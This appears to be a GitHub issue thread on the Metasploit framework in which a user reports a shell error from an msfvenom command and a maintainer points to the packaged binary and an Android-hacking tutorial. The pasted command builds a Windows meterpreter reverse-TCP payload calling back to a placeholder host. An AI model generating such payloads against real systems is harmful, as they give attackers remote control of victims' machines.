### ISSUE TITLE
creating an apk

### ISSUE THREAD

**Issue by more8797** [rapid7/metasploit-framework#14038]
root@malcolmx-HP-ProBook-4540s:/home/malcolm-x# opt/metasploit-framework/bin/../embedded/framework/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ipadd> -f exe -o payload.exe
bash: "ipadd" No such file or directory

am using ubuntu latest version and encounterd tht error 
need your help please

**Comment by busterb** [comment]
Howdy! Please don't call the embedded binaries directly here. They're hidden for a reason, since the wrong ruby and everything else will be invoked. Just use /usr/bin/msfvenom that the package installs.

I think you'd be helped by maybe following a tutorial first and getting basics before asking for help here:
https://resources.infosecinstitute.com/lab-hacking-an-android-device-with-msfvenom/

**Comment by more8797** [comment]
Ok thank you
